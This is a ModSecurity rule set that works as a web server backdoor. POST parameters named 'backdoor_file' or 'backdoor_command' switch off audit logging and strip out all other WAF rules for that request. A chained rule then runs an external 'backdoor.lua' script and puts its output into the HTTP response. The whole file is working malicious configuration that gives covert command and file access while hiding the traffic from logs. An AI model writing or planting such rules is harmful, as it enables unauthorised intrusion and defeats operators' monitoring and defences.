# "THE BEER-WARE LICENSE" (Revision 42):
# <jozef@sudolsky.sk> wrote this file.  As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a beer in return.   Jozef Sudolsky
SecAction \
    "id:800,\
    phase:1,\
    nolog,\
    pass,\
    t:none,\
    setvar:'tx.backdoor_file_argument_name=backdoor_file',\
    setvar:'tx.backdoor_command_argument_name=backdoor_command'"

SecRule ARGS_POST_NAMES "@streq %{tx.backdoor_file_argument_name}" \
    "id:810,\
    phase:2,\
    pass,\
    nolog,\
    setvar:'tx.backdoor_request_type=file',\
    ctl:auditEngine=Off,\
    ctl:ruleRemoveById=1-799,\
    ctl:ruleRemoveById=900-99999999"

SecRule ARGS_POST_NAMES "@streq %{tx.backdoor_command_argument_name}" \
    "id:820,\
    phase:2,\
    pass,\
    nolog,\
    setvar:'tx.backdoor_request_type=command',\
    ctl:auditEngine=Off,\
    ctl:ruleRemoveById=1-799,\
    ctl:ruleRemoveById=900-99999999"

SecRule &TX:BACKDOOR_REQUEST_TYPE "@eq 1" \
    "id:830,\
    phase:4,\
    pass,\
    nolog,\
    chain"
    SecRule TX:BACKDOOR_REQUEST_TYPE "@inspectFile backdoor.lua" "chain"
        SecRule STREAM_OUTPUT_BODY "@rsub s/.$/%{tx.backdoor_output}/"
